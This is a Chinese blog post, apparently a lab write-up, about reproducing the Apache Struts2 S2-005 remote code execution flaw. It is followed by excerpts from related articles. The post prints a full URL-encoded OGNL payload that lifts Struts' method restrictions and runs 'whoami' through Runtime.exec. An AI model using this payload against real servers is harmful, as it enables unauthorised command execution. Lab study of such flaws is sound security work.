0x23. Apache Struts2远程代码执行漏洞(S2-005)复现

最新推荐文章于 2022-04-15 10:05:09 发布
最新推荐文章于 2022-04-15 10:05:09 发布
阅读量824 收藏
点赞数
分类专栏: 墨者学院 文章标签: 墨者学院 S2-005
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31679787/article/details/102606087
版权

通过构造poc测试漏洞;
poc:%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29%3Dtrue&%28b%29%28%28%27\43context%5B\%27xwork.MethodAccessor.denyMethodExecution\%27%5D\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27\43mycmd\75\%27whoami\%27%27%29%28d%29%29&%28h%29%28%28%27\43myret\75@java.lang.Runtime@getRuntime%28%29.exec%28\43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27\43mydat\75new\40java.io.DataInputStream%28\43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27\43myres\75new\40byte%5B51020%5D%27%29%28d%29%29&%28k%29%28%28%27\43mydat.readFully%28\43myres%29%27%29%28d%29%29&%28l%29%28%28%27\43mystr\75new\40java.lang.String%28\43myres%29%27%29%28d%29%29&%28m%29%28%28%27\43myout\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27\43myout.getWriter%28%29.println%28\43mystr%29%27%29%28d%29%29
但是怎么构造都显示400错误,无法回显;
经过测试是由于tomcat的版本是8.5的原因;

通过使用工具进行检测,发现检测到的是s2-016漏洞;

漏洞详情:

https://xz.aliyun.com/t/2323

半情调
关注
专栏目录
墨者学院-Apache Struts2远程代码执行漏洞(S2-005)复现
JimWu的博客
09-04 619
Apache Struts2远程代码执行漏洞(S2-005)复现 难易程度:★★ 题目类型:命令执行 使用工具:k8 漏洞原理:OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码或8进制即绕过了安全限制。 1.打开靶场,了解s2-005漏洞原理 2.构造poc ?(‘u0023context[‘xwork.MethodAccesso...
0x1E. Apache Struts2远程代码执行漏洞(S2-016)复现
qq_31679787的博客
10-15 566
s2-016:在2.3.15.1之前的Struts 2中,“ action:”,“ redirect:”或“ redirectAction:”之后的信息未正确清除。由于所述信息将根据值堆栈作为OGNL表达式进行评估,因此这引入了注入服务器端代码的可能性; 使用工具检测s2-016漏洞,发现存在漏洞; 命令执行,发现key.txt; 查看文件,得到key; poc: http:...
墨者Apache Struts2远程代码执行漏洞(S2-005)复现题解
zr1213159840的博客
01-12 497
这题本来想自己手动来解决,不使用工具,奈何网上找的poc都没法用,然后我就想用工具然后wireshark抓包后重放不就行了,结果还是失败了,如果有哪位同学弄好了,希望能评论下,poc该如何使。 使用了wiresharke抓包后能看到红色中间部分的post数据包,但是放到bp中又不行,待我后面来研究下。 直接上工具: 直接拿到key了。 工具可以在这里下载: http://k8gege.org/p/ab3e87f7.html 不保证安全性,虽然我自己用了。 ...
Apache Struts最新漏洞 远程代码执行漏洞预警 2018年11月08日
网站安全专家
11-08 1161
2018年11月8日,SINE安全监控检测中心,检测到Apache Struts官方更新了一个Struts漏洞补丁,这个漏洞Apache Struts目前最新的漏洞,影响范围较广,低于Apache Struts 2.3.35的版本都会受到此次Struts漏洞的攻击,目前apache官方更新的漏洞补丁,主要是修复commonsfileupload上传库出现的安全问题,这个库可以远程执行代码,上传木...
s2系列——s2-005复现
qq_54030686的博客
03-01 4097
残缺版本exp 先采用能够爆出路径的payload,验证网址是否存在s2-005漏洞,然后在使用执行代码的payload进行利用,这里不再赘述,但是不同博主的文章下payload肯定不尽相同,有可能会出现无法利用的payload,不用担心,换一个就好 靶场使用vulhub中s2-005靶场 使用正则表达式判断回显,代码来自github上struts.py,经过些许修改,可以正常执行命令,展示 进入docker容器后,实在根目录的相应文件夹下创建文件,但是不晓得反弹shell的逻辑是啥,使用bash反弹s
墨者学院 - Apache Struts2远程代码执行漏洞(S2-005)复现
多崎巡礼的博客
09-17 2088
K8大佬神器一出 done
Apache Struts2--048远程代码执行漏洞复现
m0_48520508的博客
12-28 615
0x00简介 Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 0x01漏洞概述 Apache Struts2 2.3.x 系列启用了struts2-struts1-plugin 插件并且存在 struts2-showcase 目录,其漏洞成因是当A.
Struts2-057远程代码执行漏洞(s2-057)复现
m0_48520508的博客
12-10 923
0x00简介 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 0x01漏洞概述 漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)复现
m0_48520508的博客
12-21 2721
0x00简介 Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 0x01漏洞概述 Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OG
Struts2 S2-059 远程代码执行漏洞复现
m0_48520508的博客
11-17 1520
0x00简介 Struts2Apache 软件组织推出的一个相当强大的 Java Web 开源框架,本质上相当于一个 servlet。Struts2 基于 MVC 架构,框架结构清晰。通常作为控制器(Controller)来建立模型与视图的数据交互,用于创建企业级 Java web 应用程序,它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程
Apache Struts2S2-045)漏洞升级指南
03-07
Apache Struts2S2-045)漏洞升级指南,用于指导Apache Struts2S2-045)漏洞的本地升级工作
struts2反序列化漏洞,存在s2-005s2-016、s2-016_3、s2-017
08-28
struts2.0反序列化漏洞,存在s2-005s2-016、s2-016_3、s2-017等漏洞解决方案,已升级可用
struts2 批量扫描 s2-005-----s2-046
11-02
批量扫描,支持文件,支持单url,支持多线程。少量误报,可扩展,可修改。
Apache Struts2远程代码执行漏洞(S2-004)复现
asd158923328的博客
08-20 763
靶场地址: https://www.mozhe.cn/bug/detail/WXlXKzdpMHpjZ0JCY1NXdzRUMkhwUT09bW96aGUmozhe 根据题意 s2-004 是一个目录遍历漏洞 我们对…/ 进行二次编码之后可以去越权访问敏感数据, http://219.153.49.228:48842//struts/…%252f…%252f…%252f…%252f…%252f…...
Struts2漏洞S2-005复现笔记
hklearner的博客
03-30 2921
Struts2漏洞S2-001复现笔记 漏洞原理 s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻
struts S2-005 远程代码执行漏洞
haha1314的博客
07-15 2272
S2-005 远程代码执行漏洞 影响版本: 2.0.0 - 2.1.8.1 漏洞详情: http://struts.apache.org/docs/s2-005.html 原理 参考吴翰清的《白帽子讲Web安全》一书。 s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OG...
Apache Struts 跨站脚本漏洞
weixin_30379973的博客
11-04 220
漏洞名称: Apache Struts 跨站脚本漏洞 CNNVD编号: CNNVD-201311-010 发布时间: 2013-11-04 更新时间: 2013-11-04 危害等级: 漏洞类型: 跨站脚本 威胁类型: 远程 CVE编号: CVE-2013-6348 ...
Apache Struts2远程代码执行漏洞(S2-001)复现
m0_58606546的博客
01-14 2456
0x01 漏洞概述 1、漏洞名称 漏洞名称:Struts Remote Code Exploit 漏洞编号:Struts2-001 漏洞类型:Remote Code Execution 2、漏洞原理 Struts2 是流行和成熟的基于 MVC 设计模式的 Web 应用程序框架。 Struts2 不只是 Struts1 下一个版本,它是一个完全重写的 Struts 架构。Struts2 的标签中使用的是OGNL表达式,OGNL 是 Object Graphic Navigation Language(
Apache Struts2远程代码执行漏洞(CVE-2021-31805)安全通告
weixin_44254243的博客
04-15 6513
1. 事件描述 监测发现,开源应用框架Apache Struts存在远程代码执行漏洞(CVE-2021-31805),攻击者可构造恶意的OGNL表达式触发漏洞,实现远程代码执行。受影响版本为Apache Struts 2.0.0~2.5.29。目前,该漏洞已在Apache Struts 2.5.30版本中修复。 事件类型:漏洞利用 事件等级:高危 2. 影响范围 远程代码执行漏洞影响范围: 2.0.0<=Apache Struts <= 2.5.29 不受影响版本 Apache Struts
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值